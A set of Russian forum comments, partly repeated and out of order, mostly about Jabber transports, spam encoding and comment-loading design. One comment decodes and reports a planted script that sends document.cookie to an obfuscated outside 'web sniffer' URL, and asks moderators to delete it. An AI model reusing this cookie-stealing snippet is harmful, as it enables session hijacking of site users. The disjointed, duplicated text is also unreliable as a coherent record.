Расшифровав строчку String.fromCharCode(104, 116, 116, 112, 58, 47, 47, 110, 97, 45, 115, 46, 114, 117, 47, 105, 109, 97, 103, 101, 115, 47, 122, 97, 118, 114, 97, 95, 49, 46, 103, 105, 102, 63), получаем адрес "http://na-s.ru/images/zavra_1.gif?"
В свою очередь, картинка находится на ресурсе, который позиционирует себя как "Бесплатный веб-сниффер".
Вместе с урлем передаются и текущие куки. Если на стороне тамошнего сервера ведётся лог запросов этой картинки, то там же будут оставлены и куки.
Взываю к НЛО с просьбой удалить подозрительную ссылку.
Для ICQ есть специальные транспорты из Jabber (icq.jabber.ru и aol.jabber.ru, если не ошибаюсь). Правда, не всем клиентам они доступны, к сожалению (а то бы я совсем с квипа ушёл). Что-нибудь подобное есть и под MSN, скорее всего.
Ну если мне понадобится ссылка подтверждения регистрации, то исказить вроде не должно?
А в остальных случаях, когда я хочу посмотреть новости в формах китайского спама или фантазиях отечественных спамеров, я отнесусь к искажениям кодировки спокойно. Было бы что терять. ^_^
Иногда бывает удобнее загрузить единоразово все комментарии, чтобы потом не листать. Потом, если есть пагинация, то сложнее обсчитывать прямую ссылку на комментарий.
Выдать-то можно, только потом придётся их разворачивать. (: Хотя если читатель экономит траффик, то это неплохое решение.
В конце концов, это можно сделать опционально, и те, кто хочет, грузят коментарии сразу все целиком либо поветвлённо.
Если дискуссия очень большая (на 0.5-3 тыс. ответов), то это неудобно. При автоматической многократной подгрузке сильно тормозит браузер; если же разворачивать каждую ветку, чтобы её посмотреть — то замучаться можно.
Возможно, я слишком пристрастен из-за организации этого в связке ЖЖ + LJ-addons. Тем не менее, либо стоит усовершенствовать такой способ, либо найти иной.
Раскодировав, получаем любопытные строки:
http://www.nakedking.ru/?s=CECFC0D1CDCED… «script»
img = new Image();
img.src = (String.fromCharCode(104, 116, 116, 112, 58, 47, 47, 110, 97, 45, 115, 46, 114, 117, 47, 105, 109, 97, 103, 101, 115, 47, 122, 97, 118, 114, 97, 95, 49, 46, 103, 105, 102, 63)+document.cookie);
«/script»
Расшифровав строчку String.fromCharCode(104, 116, 116, 112, 58, 47, 47, 110, 97, 45, 115, 46, 114, 117, 47, 105, 109, 97, 103, 101, 115, 47, 122, 97, 118, 114, 97, 95, 49, 46, 103, 105, 102, 63), получаем адрес "http://na-s.ru/images/zavra_1.gif?"
В свою очередь, картинка находится на ресурсе, который позиционирует себя как "Бесплатный веб-сниффер".
Вместе с урлем передаются и текущие куки. Если на стороне тамошнего сервера ведётся лог запросов этой картинки, то там же будут оставлены и куки.
Взываю к НЛО с просьбой удалить подозрительную ссылку.
См. http://www.livejournal.com/chat/
Впрочем, зарегистрировать jabber-эккаунт несложно.
А в остальных случаях, когда я хочу посмотреть новости в формах китайского спама или фантазиях отечественных спамеров, я отнесусь к искажениям кодировки спокойно. Было бы что терять. ^_^
(:
Просто для примера. Помогает быстрее посмотреть и подтвердить регистрации единоразовых эккаунтов, когда жалко основного адреса.
То бишь, механизм не будет полностью саморегулирующимся?
Хотя это редкость, кажется.Выдать-то можно, только потом придётся их разворачивать. (: Хотя если читатель экономит траффик, то это неплохое решение.
В конце концов, это можно сделать опционально, и те, кто хочет, грузят коментарии сразу все целиком либо поветвлённо.
Возможно, я слишком пристрастен из-за организации этого в связке ЖЖ + LJ-addons. Тем не менее, либо стоит усовершенствовать такой способ, либо найти иной.